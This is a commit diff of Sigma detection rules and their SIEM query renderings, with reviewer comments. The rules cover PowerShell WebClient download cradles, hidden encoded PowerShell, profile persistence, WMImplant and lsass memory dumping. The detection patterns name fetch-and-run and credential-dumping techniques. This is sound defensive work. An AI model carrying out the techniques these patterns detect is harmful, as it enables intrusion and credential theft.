This commit is contained in:
Yugoslavskiy Daniil 2020-04-07 05:10:56 +02:00
parent 4d79a25830
commit 9b4b5e4ac6
92 changed files with 1823 additions and 839 deletions

View File

@ -1,8 +1,8 @@
| Title | DN_0050_1102_audit_log_was_cleared |
|:-------------------|:------------------|
| **Description** | This event generates every time Windows Security audit log was cleared |
| **Description** | Event 1102 is created whenever the Security log is cleared, REGARDLESS of the status of the Audit System Events audit policy |
| **Logging Policy** | <ul><li> Not existing </li></ul> |
| **References** | <ul><li>[https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-1102.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-1102.md)</li></ul> |
| **References** | <ul><li>[https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-1102.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-1102.md)</li><li>[https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=1102](https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=1102)</li></ul> |
| **Platform** | Windows |
| **Type** | Windows Log |
| **Channel** | Security |
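Review bot: The Logging Policy row still reads "Not existing" while the rewritten Description now states that Event 1102 is written regardless of the Audit System Events policy, so the two rows read as contradicting each other. Suggest rewording the row to something like "None required: 1102 is generated whenever the Security log is cleared, independent of audit policy settings", so a reader understands there is nothing to configure rather than a documentation gap. The added ultimatewindowssecurity reference is a good addition since it documents the event fields.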

View File

@ -26,15 +26,20 @@ tags:
- attack.t1086
author: Florian Roth
date: 2017/03/05
modified: 2020/03/25
logsource:
product: windows
service: powershell
detection:
keywords:
Message:
- '*System.Net.WebClient).DownloadString(*'
- '*system.net.webclient).downloadfile(*'
condition: keywords
downloadfile:
Message|contains|all:
- 'System.Net.WebClient'
- '.DownloadFile('
downloadstring:
Message|contains|all:
- 'System.Net.WebClient'
- '.DownloadString('
condition: downloadfile or downloadstring
falsepositives:
- PowerShell scripts that download content from the Internet
level: medium
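Review bot: The new `downloadfile` / `downloadstring` selectors drop the explicit lower-case variant `system.net.webclient).downloadfile(` that the old keyword list carried on purpose. Sigma string matching is case-insensitive by specification, but several backends render `contains|all` onto case-sensitive `.keyword` wildcard fields (see the es-qs and graylog output in the following hunk), so a lower-cased call stops matching there while Splunk's case-insensitive matching is unaffected. Either keep both casings in the value lists or confirm that the target indices normalize case. Also, `modified: 2020/03/25` is unchanged context although the detection logic changed in this hunk; bump it per Sigma convention.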
@ -48,42 +53,42 @@ level: medium
### es-qs
```
Message.keyword:(*System.Net.WebClient\\).DownloadString\\(* OR *system.net.webclient\\).downloadfile\\(*)
(Message.keyword:*System.Net.WebClient* AND (Message.keyword:*.DownloadFile\\(* OR Message.keyword:*.DownloadString\\(*))
```
### xpack-watcher
```
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/65531a81-a694-4e31-ae04-f8ba5bc33759 <<EOF\n{\n "metadata": {\n "title": "Suspicious PowerShell Download",\n "description": "Detects suspicious PowerShell download command",\n "tags": [\n "attack.execution",\n "attack.t1086"\n ],\n "query": "Message.keyword:(*System.Net.WebClient\\\\).DownloadString\\\\(* OR *system.net.webclient\\\\).downloadfile\\\\(*)"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "Message.keyword:(*System.Net.WebClient\\\\).DownloadString\\\\(* OR *system.net.webclient\\\\).downloadfile\\\\(*)",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Suspicious PowerShell Download\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}{{_source}}\\n================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/65531a81-a694-4e31-ae04-f8ba5bc33759 <<EOF\n{\n "metadata": {\n "title": "Suspicious PowerShell Download",\n "description": "Detects suspicious PowerShell download command",\n "tags": [\n "attack.execution",\n "attack.t1086"\n ],\n "query": "(Message.keyword:*System.Net.WebClient* AND (Message.keyword:*.DownloadFile\\\\(* OR Message.keyword:*.DownloadString\\\\(*))"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "(Message.keyword:*System.Net.WebClient* AND (Message.keyword:*.DownloadFile\\\\(* OR Message.keyword:*.DownloadString\\\\(*))",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Suspicious PowerShell Download\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}{{_source}}\\n================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
```
### graylog
```
Message.keyword:(*System.Net.WebClient\\).DownloadString\\(* *system.net.webclient\\).downloadfile\\(*)
(Message.keyword:*System.Net.WebClient* AND (Message.keyword:*.DownloadFile\\(* OR Message.keyword:*.DownloadString\\(*))
```
### splunk
```
(Message="*System.Net.WebClient).DownloadString(*" OR Message="*system.net.webclient).downloadfile(*")
(Message="*System.Net.WebClient*" (Message="*.DownloadFile(*" OR Message="*.DownloadString(*"))
```
### logpoint
```
Message IN ["*System.Net.WebClient).DownloadString(*", "*system.net.webclient).downloadfile(*"]
(Message="*System.Net.WebClient*" (Message="*.DownloadFile(*" OR Message="*.DownloadString(*"))
```
### grep
```
grep -P '^(?:.*.*System\\.Net\\.WebClient\\)\\.DownloadString\\(.*|.*.*system\\.net\\.webclient\\)\\.downloadfile\\(.*)'
grep -P '^(?:.*(?=.*.*System\\.Net\\.WebClient.*)(?=.*(?:.*(?:.*.*\\.DownloadFile\\(.*|.*.*\\.DownloadString\\(.*))))'
```
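Review bot: The regenerated es-qs, graylog and xpack-watcher queries (second line of each block) now wrap `System.Net.WebClient` in leading and trailing wildcards on `Message.keyword`; with `analyze_wildcard: true` in the watcher body this is a leading-wildcard scan over every distinct value of the field, repeated on the 30-minute schedule, so confirm the PowerShell index is small enough for that or scope the query further. Style point on the new grep line: every lookahead stacks `.*.*` (e.g. `(?=.*.*System\\.Net\\.WebClient.*)`), which is correct but redundant and could be collapsed in the generator.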

View File

@ -36,7 +36,7 @@ detection:
hidden:
- ' -w hidden '
- ' -window hidden '
- ' - windowstyle hidden '
- ' -windowstyle hidden '
noninteractive:
- ' -noni '
- ' -noninteractive '
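Review bot: The fix from `' - windowstyle hidden '` to `' -windowstyle hidden '` closes a real gap: the stray space after the dash meant the full spelling of the switch never matched and only the `-w` and `-window` forms fired. Worth recording in the rule that powershell.exe accepts any unambiguous prefix of a parameter name, so the three listed spellings do not exhaust the ways `-WindowStyle hidden` can be written; a `contains|all` on `-w` and `hidden` within the same selector would be the broader (and noisier) alternative if coverage matters more than precision here.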
@ -55,42 +55,42 @@ level: high
### es-qs
```
(\\*.keyword:(*\\ \\-enc\\ * OR *\\ \\-EncodedCommand\\ *) AND \\*.keyword:(*\\ \\-w\\ hidden\\ * OR *\\ \\-window\\ hidden\\ * OR *\\ \\-\\ windowstyle\\ hidden\\ *) AND \\*.keyword:(*\\ \\-noni\\ * OR *\\ \\-noninteractive\\ *))
(\\*.keyword:(*\\ \\-enc\\ * OR *\\ \\-EncodedCommand\\ *) AND \\*.keyword:(*\\ \\-w\\ hidden\\ * OR *\\ \\-window\\ hidden\\ * OR *\\ \\-windowstyle\\ hidden\\ *) AND \\*.keyword:(*\\ \\-noni\\ * OR *\\ \\-noninteractive\\ *))
```
### xpack-watcher
```
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/3d304fda-78aa-43ed-975c-d740798a49c1 <<EOF\n{\n "metadata": {\n "title": "Suspicious PowerShell Invocations - Generic",\n "description": "Detects suspicious PowerShell invocation command parameters",\n "tags": [\n "attack.execution",\n "attack.t1086"\n ],\n "query": "(\\\\*.keyword:(*\\\\ \\\\-enc\\\\ * OR *\\\\ \\\\-EncodedCommand\\\\ *) AND \\\\*.keyword:(*\\\\ \\\\-w\\\\ hidden\\\\ * OR *\\\\ \\\\-window\\\\ hidden\\\\ * OR *\\\\ \\\\-\\\\ windowstyle\\\\ hidden\\\\ *) AND \\\\*.keyword:(*\\\\ \\\\-noni\\\\ * OR *\\\\ \\\\-noninteractive\\\\ *))"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "(\\\\*.keyword:(*\\\\ \\\\-enc\\\\ * OR *\\\\ \\\\-EncodedCommand\\\\ *) AND \\\\*.keyword:(*\\\\ \\\\-w\\\\ hidden\\\\ * OR *\\\\ \\\\-window\\\\ hidden\\\\ * OR *\\\\ \\\\-\\\\ windowstyle\\\\ hidden\\\\ *) AND \\\\*.keyword:(*\\\\ \\\\-noni\\\\ * OR *\\\\ \\\\-noninteractive\\\\ *))",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Suspicious PowerShell Invocations - Generic\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}{{_source}}\\n================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/3d304fda-78aa-43ed-975c-d740798a49c1 <<EOF\n{\n "metadata": {\n "title": "Suspicious PowerShell Invocations - Generic",\n "description": "Detects suspicious PowerShell invocation command parameters",\n "tags": [\n "attack.execution",\n "attack.t1086"\n ],\n "query": "(\\\\*.keyword:(*\\\\ \\\\-enc\\\\ * OR *\\\\ \\\\-EncodedCommand\\\\ *) AND \\\\*.keyword:(*\\\\ \\\\-w\\\\ hidden\\\\ * OR *\\\\ \\\\-window\\\\ hidden\\\\ * OR *\\\\ \\\\-windowstyle\\\\ hidden\\\\ *) AND \\\\*.keyword:(*\\\\ \\\\-noni\\\\ * OR *\\\\ \\\\-noninteractive\\\\ *))"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "(\\\\*.keyword:(*\\\\ \\\\-enc\\\\ * OR *\\\\ \\\\-EncodedCommand\\\\ *) AND \\\\*.keyword:(*\\\\ \\\\-w\\\\ hidden\\\\ * OR *\\\\ \\\\-window\\\\ hidden\\\\ * OR *\\\\ \\\\-windowstyle\\\\ hidden\\\\ *) AND \\\\*.keyword:(*\\\\ \\\\-noni\\\\ * OR *\\\\ \\\\-noninteractive\\\\ *))",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Suspicious PowerShell Invocations - Generic\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}{{_source}}\\n================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
```
### graylog
```
(\\*.keyword:(* \\-enc * OR * \\-EncodedCommand *) AND \\*.keyword:(* \\-w hidden * OR * \\-window hidden * OR * \\- windowstyle hidden *) AND \\*.keyword:(* \\-noni * OR * \\-noninteractive *))
(\\*.keyword:(* \\-enc * OR * \\-EncodedCommand *) AND \\*.keyword:(* \\-w hidden * OR * \\-window hidden * OR * \\-windowstyle hidden *) AND \\*.keyword:(* \\-noni * OR * \\-noninteractive *))
```
### splunk
```
((" -enc " OR " -EncodedCommand ") (" -w hidden " OR " -window hidden " OR " - windowstyle hidden ") (" -noni " OR " -noninteractive "))
((" -enc " OR " -EncodedCommand ") (" -w hidden " OR " -window hidden " OR " -windowstyle hidden ") (" -noni " OR " -noninteractive "))
```
### logpoint
```
((" -enc " OR " -EncodedCommand ") (" -w hidden " OR " -window hidden " OR " - windowstyle hidden ") (" -noni " OR " -noninteractive "))
((" -enc " OR " -EncodedCommand ") (" -w hidden " OR " -window hidden " OR " -windowstyle hidden ") (" -noni " OR " -noninteractive "))
```
### grep
```
grep -P '^(?:.*(?=.*(?:.*(?:.* -enc |.* -EncodedCommand )))(?=.*(?:.*(?:.* -w hidden |.* -window hidden |.* - windowstyle hidden )))(?=.*(?:.*(?:.* -noni |.* -noninteractive ))))'
grep -P '^(?:.*(?=.*(?:.*(?:.* -enc |.* -EncodedCommand )))(?=.*(?:.*(?:.* -w hidden |.* -window hidden |.* -windowstyle hidden )))(?=.*(?:.*(?:.* -noni |.* -noninteractive ))))'
```
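Review bot: All six backend renderings pick up the corrected `-windowstyle hidden` token consistently, so the regeneration is mechanically right. What stands out is that the Sigma source behind these queries binds the keywords to no field, which renders as a `\\*.keyword` match across every keyword field in es-qs and graylog and as bare quoted terms in Splunk and logpoint. Binding the three selectors to the command-line field of the log source (CommandLine for process creation, Message or ScriptBlockText for PowerShell logs) would make the query cheaper and confine matches to the field the rule is actually about.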

View File

@ -0,0 +1,99 @@
| Title | Powershell Profile.ps1 Modification |
|:-------------------------|:------------------|
| **Description** | Detects a change in profile.ps1 of the Powershell profile |
| **ATT&amp;CK Tactic** | <ul><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li><li>[TA0004: Privilege Escalation](https://attack.mitre.org/tactics/TA0004)</li></ul> |
| **ATT&amp;CK Technique** | This Detection Rule wasn't mapped to ATT&amp;CK Technique yet |
| **Data Needed** | <ul><li>[DN_0015_11_windows_sysmon_FileCreate](../Data_Needed/DN_0015_11_windows_sysmon_FileCreate.md)</li></ul> |
| **Trigger** | There is no documented Trigger for this Detection Rule yet |
| **Severity Level** | high |
| **False Positives** | <ul><li>System administrator create Powershell profile manually</li></ul> |
| **Development Status** | experimental |
| **References** | <ul><li>[https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/](https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/)</li></ul> |
| **Author** | HieuTT35 |
## Detection Rules
### Sigma rule
```
title: Powershell Profile.ps1 Modification
id: b5b78988-486d-4a80-b991-930eff3ff8bf
status: experimental
description: Detects a change in profile.ps1 of the Powershell profile
references:
- https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/
author: HieuTT35
date: 2019/10/24
modified: 2020/04/03
logsource:
product: windows
service: sysmon
detection:
event:
EventID: 11
target1:
TargetFilename|contains|all:
- '\My Documents\PowerShell\'
- '\profile.ps1'
target2:
TargetFilename|contains|all:
- 'C:\Windows\System32\WindowsPowerShell\v1.0\'
- '\profile.ps1'
condition: event and (target1 or target2)
falsepositives:
- System administrator create Powershell profile manually
level: high
tags:
- attack.persistence
- attack.privilege_escalation
```
### es-qs
```
(EventID:"11" AND TargetFilename.keyword:*\\\\profile.ps1* AND (TargetFilename.keyword:*\\\\My\\ Documents\\\\PowerShell\\* OR TargetFilename.keyword:*C\\:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\*))
```
### xpack-watcher
```
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/b5b78988-486d-4a80-b991-930eff3ff8bf <<EOF\n{\n "metadata": {\n "title": "Powershell Profile.ps1 Modification",\n "description": "Detects a change in profile.ps1 of the Powershell profile",\n "tags": [\n "attack.persistence",\n "attack.privilege_escalation"\n ],\n "query": "(EventID:\\"11\\" AND TargetFilename.keyword:*\\\\\\\\profile.ps1* AND (TargetFilename.keyword:*\\\\\\\\My\\\\ Documents\\\\\\\\PowerShell\\\\* OR TargetFilename.keyword:*C\\\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\WindowsPowerShell\\\\\\\\v1.0\\\\*))"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "(EventID:\\"11\\" AND TargetFilename.keyword:*\\\\\\\\profile.ps1* AND (TargetFilename.keyword:*\\\\\\\\My\\\\ Documents\\\\\\\\PowerShell\\\\* OR TargetFilename.keyword:*C\\\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\WindowsPowerShell\\\\\\\\v1.0\\\\*))",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Powershell Profile.ps1 Modification\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}{{_source}}\\n================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
```
### graylog
```
(EventID:"11" AND TargetFilename.keyword:*\\\\profile.ps1* AND (TargetFilename.keyword:*\\\\My Documents\\\\PowerShell\\* OR TargetFilename.keyword:*C\\:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\*))
```
### splunk
```
(EventID="11" TargetFilename="*\\\\profile.ps1*" (TargetFilename="*\\\\My Documents\\\\PowerShell\\*" OR TargetFilename="*C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\*"))
```
### logpoint
```
(event_id="11" TargetFilename="*\\\\profile.ps1*" (TargetFilename="*\\\\My Documents\\\\PowerShell\\*" OR TargetFilename="*C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\*"))
```
### grep
```
grep -P '^(?:.*(?=.*11)(?=.*.*\\profile\\.ps1.*)(?=.*(?:.*(?:.*.*\\My Documents\\PowerShell\\.*|.*.*C:\\Windows\\System32\\WindowsPowerShell\\v1\\.0\\.*))))'
```
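Review bot: The `target1` path fragment `'\My Documents\PowerShell\'` is unlikely to match real Sysmon Event 11 paths: since Windows Vista the on-disk folder is `Documents` (`My Documents` is only the shell display name), the Windows PowerShell per-user profile lives under `Documents\WindowsPowerShell\`, and `Documents\PowerShell\` is used by PowerShell Core. As written, the per-user branch of the rule will practically never fire and only the `System32\WindowsPowerShell\v1.0\` branch carries the detection. Suggest `'\Documents\WindowsPowerShell\'` and `'\Documents\PowerShell\'` as separate selectors. The `'\profile.ps1'` filter also skips the host-specific profile names `Microsoft.PowerShell_profile.ps1` and `Microsoft.PowerShellISE_profile.ps1`, which serve the same persistence purpose; `TargetFilename|endswith: '_profile.ps1'` alongside `'\profile.ps1'` would cover them. On the table, the ATT&CK Technique row says "wasn't mapped" while the Turla reference describes profile-based persistence, which ATT&CK now covers as Event Triggered Execution: PowerShell Profile (T1546.013). Minor: "System administrator create" should read "creates" in falsepositives.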

View File

@ -0,0 +1,112 @@
| Title | WMImplant Hack Tool |
|:-------------------------|:------------------|
| **Description** | Detects parameters used by WMImplant |
| **ATT&amp;CK Tactic** | <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul> |
| **ATT&amp;CK Technique** | <ul><li>[T1047: Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)</li></ul> |
| **Data Needed** | <ul><li>[DN_0036_4104_windows_powershell_script_block](../Data_Needed/DN_0036_4104_windows_powershell_script_block.md)</li></ul> |
| **Trigger** | <ul><li>[T1047: Windows Management Instrumentation](../Triggers/T1047.md)</li></ul> |
| **Severity Level** | high |
| **False Positives** | <ul><li>Administrative scripts that use the same keywords.</li></ul> |
| **Development Status** | experimental |
| **References** | <ul><li>[https://github.com/FortyNorthSecurity/WMImplant](https://github.com/FortyNorthSecurity/WMImplant)</li></ul> |
| **Author** | NVISO |
## Detection Rules
### Sigma rule
```
title: WMImplant Hack Tool
id: 8028c2c3-e25a-46e3-827f-bbb5abf181d7
status: experimental
description: Detects parameters used by WMImplant
references:
- https://github.com/FortyNorthSecurity/WMImplant
tags:
- attack.execution
- attack.t1047
author: NVISO
date: 2020/03/26
logsource:
product: windows
service: powershell
description: "Script block logging must be enabled"
detection:
selection:
ScriptBlockText|contains:
- "WMImplant"
- " change_user "
- " gen_cli "
- " command_exec "
- " disable_wdigest "
- " disable_winrm "
- " enable_wdigest "
- " enable_winrm "
- " registry_mod "
- " remote_posh "
- " sched_job "
- " service_mod "
- " process_kill "
# - " process_start "
- " active_users "
- " basic_info "
# - " drive_list "
# - " installed_programs "
- " power_off "
- " vacant_system "
- " logon_events "
condition: selection
falsepositives:
- Administrative scripts that use the same keywords.
level: high
```
### es-qs
```
ScriptBlockText.keyword:(*WMImplant* OR *\\ change_user\\ * OR *\\ gen_cli\\ * OR *\\ command_exec\\ * OR *\\ disable_wdigest\\ * OR *\\ disable_winrm\\ * OR *\\ enable_wdigest\\ * OR *\\ enable_winrm\\ * OR *\\ registry_mod\\ * OR *\\ remote_posh\\ * OR *\\ sched_job\\ * OR *\\ service_mod\\ * OR *\\ process_kill\\ * OR *\\ active_users\\ * OR *\\ basic_info\\ * OR *\\ power_off\\ * OR *\\ vacant_system\\ * OR *\\ logon_events\\ *)
```
### xpack-watcher
```
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/8028c2c3-e25a-46e3-827f-bbb5abf181d7 <<EOF\n{\n "metadata": {\n "title": "WMImplant Hack Tool",\n "description": "Detects parameters used by WMImplant",\n "tags": [\n "attack.execution",\n "attack.t1047"\n ],\n "query": "ScriptBlockText.keyword:(*WMImplant* OR *\\\\ change_user\\\\ * OR *\\\\ gen_cli\\\\ * OR *\\\\ command_exec\\\\ * OR *\\\\ disable_wdigest\\\\ * OR *\\\\ disable_winrm\\\\ * OR *\\\\ enable_wdigest\\\\ * OR *\\\\ enable_winrm\\\\ * OR *\\\\ registry_mod\\\\ * OR *\\\\ remote_posh\\\\ * OR *\\\\ sched_job\\\\ * OR *\\\\ service_mod\\\\ * OR *\\\\ process_kill\\\\ * OR *\\\\ active_users\\\\ * OR *\\\\ basic_info\\\\ * OR *\\\\ power_off\\\\ * OR *\\\\ vacant_system\\\\ * OR *\\\\ logon_events\\\\ *)"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "ScriptBlockText.keyword:(*WMImplant* OR *\\\\ change_user\\\\ * OR *\\\\ gen_cli\\\\ * OR *\\\\ command_exec\\\\ * OR *\\\\ disable_wdigest\\\\ * OR *\\\\ disable_winrm\\\\ * OR *\\\\ enable_wdigest\\\\ * OR *\\\\ enable_winrm\\\\ * OR *\\\\ registry_mod\\\\ * OR *\\\\ remote_posh\\\\ * OR *\\\\ sched_job\\\\ * OR *\\\\ service_mod\\\\ * OR *\\\\ process_kill\\\\ * OR *\\\\ active_users\\\\ * OR *\\\\ basic_info\\\\ * OR *\\\\ power_off\\\\ * OR *\\\\ vacant_system\\\\ * OR *\\\\ logon_events\\\\ *)",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'WMImplant Hack Tool\'",\n "body": 
"Hits:\\n{{#ctx.payload.hits.hits}}{{_source}}\\n================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
```
### graylog
```
ScriptBlockText.keyword:(*WMImplant* * change_user * * gen_cli * * command_exec * * disable_wdigest * * disable_winrm * * enable_wdigest * * enable_winrm * * registry_mod * * remote_posh * * sched_job * * service_mod * * process_kill * * active_users * * basic_info * * power_off * * vacant_system * * logon_events *)
```
### splunk
```
(ScriptBlockText="*WMImplant*" OR ScriptBlockText="* change_user *" OR ScriptBlockText="* gen_cli *" OR ScriptBlockText="* command_exec *" OR ScriptBlockText="* disable_wdigest *" OR ScriptBlockText="* disable_winrm *" OR ScriptBlockText="* enable_wdigest *" OR ScriptBlockText="* enable_winrm *" OR ScriptBlockText="* registry_mod *" OR ScriptBlockText="* remote_posh *" OR ScriptBlockText="* sched_job *" OR ScriptBlockText="* service_mod *" OR ScriptBlockText="* process_kill *" OR ScriptBlockText="* active_users *" OR ScriptBlockText="* basic_info *" OR ScriptBlockText="* power_off *" OR ScriptBlockText="* vacant_system *" OR ScriptBlockText="* logon_events *")
```
### logpoint
```
ScriptBlockText IN ["*WMImplant*", "* change_user *", "* gen_cli *", "* command_exec *", "* disable_wdigest *", "* disable_winrm *", "* enable_wdigest *", "* enable_winrm *", "* registry_mod *", "* remote_posh *", "* sched_job *", "* service_mod *", "* process_kill *", "* active_users *", "* basic_info *", "* power_off *", "* vacant_system *", "* logon_events *"]
```
### grep
```
grep -P '^(?:.*.*WMImplant.*|.*.* change_user .*|.*.* gen_cli .*|.*.* command_exec .*|.*.* disable_wdigest .*|.*.* disable_winrm .*|.*.* enable_wdigest .*|.*.* enable_winrm .*|.*.* registry_mod .*|.*.* remote_posh .*|.*.* sched_job .*|.*.* service_mod .*|.*.* process_kill .*|.*.* active_users .*|.*.* basic_info .*|.*.* power_off .*|.*.* vacant_system .*|.*.* logon_events .*)'
```
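Review bot: Three selector strings (`process_start`, `drive_list`, `installed_programs`) are commented out without any rationale in the rule or the falsepositives section; a short inline comment such as `# too generic, matches inventory scripts` would stop the next maintainer from re-enabling them blindly. Also, `description: "Script block logging must be enabled"` sits under `logsource`, but the Sigma `logsource` block only defines `category`, `product`, `service` and `definition`; this prerequisite belongs in `definition` so schema validators accept it. Finally, the bare `WMImplant` keyword and the underscore verbs are rendered onto the case-sensitive `ScriptBlockText.keyword` field in es-qs and graylog, so a lower-cased tool name would not match there while it would in Splunk.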

View File

@ -25,7 +25,7 @@ description: Detects the access to processes by other suspicious processes which
few calls in the stack (ntdll.dll --> kernelbase.dll --> unknown) which essentially means that most of the functions required by the process to execute certain
routines are already present in memory, not requiring any calls to external libraries. The latter should also be considered suspicious.
status: experimental
date: 27/10/2019
date: 2019/10/27
author: Perez Diego (@darkquassar), oscd.community
references:
- https://azure.microsoft.com/en-ca/blog/detecting-in-memory-attacks-with-sysmon-and-azure-security-center/

View File

@ -23,7 +23,7 @@ status: experimental
description: Detects the use of MiniDumpWriteDump API for dumping lsass.exe memory in a stealth way. Tools like ProcessHacker and some attacker tradecract use this
API found in dbghelp.dll or dbgcore.dll. As an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and
transfer it over the network back to the attacker's machine.
date: 27/10/2019
date: 2019/10/27
modified: 2019/11/13
author: Perez Diego (@darkquassar), oscd.community
references:
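Review bot: Two spelling slips sit in the unchanged description context right next to the date fix: "tradecract" should be "tradecraft", and the C2 framework is spelled "SILENTTRINITY", not "SilentTrynity"; since the rule is being touched anyway, fixing them here saves another round-trip with upstream. The same sentence also mixes "lsass.exe" and "Lsass.exe"; pick one.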

File diff suppressed because one or more lines are too long

View File

@ -0,0 +1,99 @@
| Title | Suspicious ADSI-Cache Usage By Unknown Tool |
|:-------------------------|:------------------|
| **Description** | detects the usage of ADSI (LDAP) operations by tools. This may also detect tools like LDAPFragger. |
| **ATT&amp;CK Tactic** | <ul><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li></ul> |
| **ATT&amp;CK Technique** | <ul><li>[T1041: Exfiltration Over Command and Control Channel](https://attack.mitre.org/techniques/T1041)</li></ul> |
| **Data Needed** | <ul><li>[DN_0015_11_windows_sysmon_FileCreate](../Data_Needed/DN_0015_11_windows_sysmon_FileCreate.md)</li></ul> |
| **Trigger** | <ul><li>[T1041: Exfiltration Over Command and Control Channel](../Triggers/T1041.md)</li></ul> |
| **Severity Level** | high |
| **False Positives** | <ul><li>Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc.</li></ul> |
| **Development Status** | experimental |
